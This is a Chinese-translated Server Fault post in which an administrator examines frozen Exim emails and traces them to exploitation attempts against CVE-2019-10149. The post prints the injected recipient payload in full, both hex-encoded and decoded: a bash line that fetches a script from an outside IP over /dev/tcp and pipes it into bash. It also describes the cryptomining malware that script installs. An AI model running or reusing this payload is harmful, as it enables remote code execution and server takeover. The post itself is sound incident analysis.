帶有類似程式碼注入的收件人的突然身份不明的凍結電子郵件

我突然從我的伺服器（Exim 4.89，Debian stable）收到了一些奇怪的“消息凍結”電子郵件：

消息 1hcbPR-0005t1-2r 已被凍結（傳遞錯誤消息）。

發件人是<>。

以下地址尚未送達：

root+${執行{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\ x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\ x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\ x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@ localhost：太多“已接收”標頭 - 可疑郵件循環

$ sudo exim4 -Mvb 1hcbPR-0005t1-2r
1hcbPR-0005t1-2r-D
$ sudo exim4 -Mvh 1hcbPR-0005t1-2r
1hcbPR-0005t1-2r-H
Debian-exim 101 103
<>
1560715549 0
-helo_name localhost
-host_address 163.172.157.143.51642
-interface_address <MY.IP>.25
-received_protocol smtp
-body_linecount 0
-max_received_linelength 12
-frozen 1560715549
-host_lookup_failed
XX
1
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost

569P Received: from [163.172.157.143] (helo=localhost)
   by myserver.example.org with smtp (Exim 4.89)
   id 1hcbPR-0005t1-2r
   for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost; Sun, 16 Jun 2019 22:05:49 +0200
012P Received: 1
012P Received: 2
012P Received: 3
012P Received: 4
012P Received: 5
012P Received: 6
012P Received: 7
012P Received: 8
012P Received: 9
013P Received: 10
013P Received: 11
013P Received: 12
013P Received: 13
013P Received: 14
013P Received: 15
013P Received: 16
013P Received: 17
013P Received: 18
013P Received: 19
013P Received: 20
013P Received: 21
013P Received: 22
013P Received: 23
013P Received: 24
013P Received: 25
013P Received: 26
013P Received: 27
013P Received: 28
013P Received: 29
013P Received: 30
013P Received: 31

它看起來像程式碼注入，但我不明白，它看起來對我沒有太大危害：

root+${run{/bin/bash -c "exec 5<>/dev/tcp/51.38.133.232/80;echo -e 'GET / HTTP/1.0\n' >&5;tail -n +11 <&5 | bash" &}}@localhost: Too many "Received" headers - suspected mail loop

所有消息都是相似的，具有不同的 IP 地址和埠。他們都來自同一個地址。

它是一種已知的感染嗎？

我在發布之前找到了答案，認為它可能對其他人有幫助：它確實對應於利用 Exim 漏洞的嘗試，該漏洞允許遠端執行任意程式碼。它是在一周前宣布並修復的 ( CVE-2019-10149 )。

可以在此處找到有關此漏洞的更多詳細資訊。

更新 ：

實際上註入的程式碼根本不是無害的 ：

exec 5<>/dev/tcp/51.38.133.232/80

將新文件描述符 5 分配給 51.38.133.232 埠 80 上的 TCP 連接。也就是說，從文件描述符 5 重定向到和從文件描述符 5 將寫入和讀取這個 IP！

然後

echo -e 'GET / HTTP/1.0\n' >&5

將向該伺服器發送一個 HTTP GET 請求，並且

tail -n +11 <&5

將丟棄 HTTP 標頭，只保留一個惡意 bash 腳本，該腳本最終通過 bash 管道執行：

|bash

所述腳本是一個加密劫持礦工，其中包括刪除根 crontab 和一些管理工具（例如netstat），殺死正在執行的程序以保留所有 CPU，並嘗試通過 SSH 傳播……

引用自：https://serverfault.com/questions/971654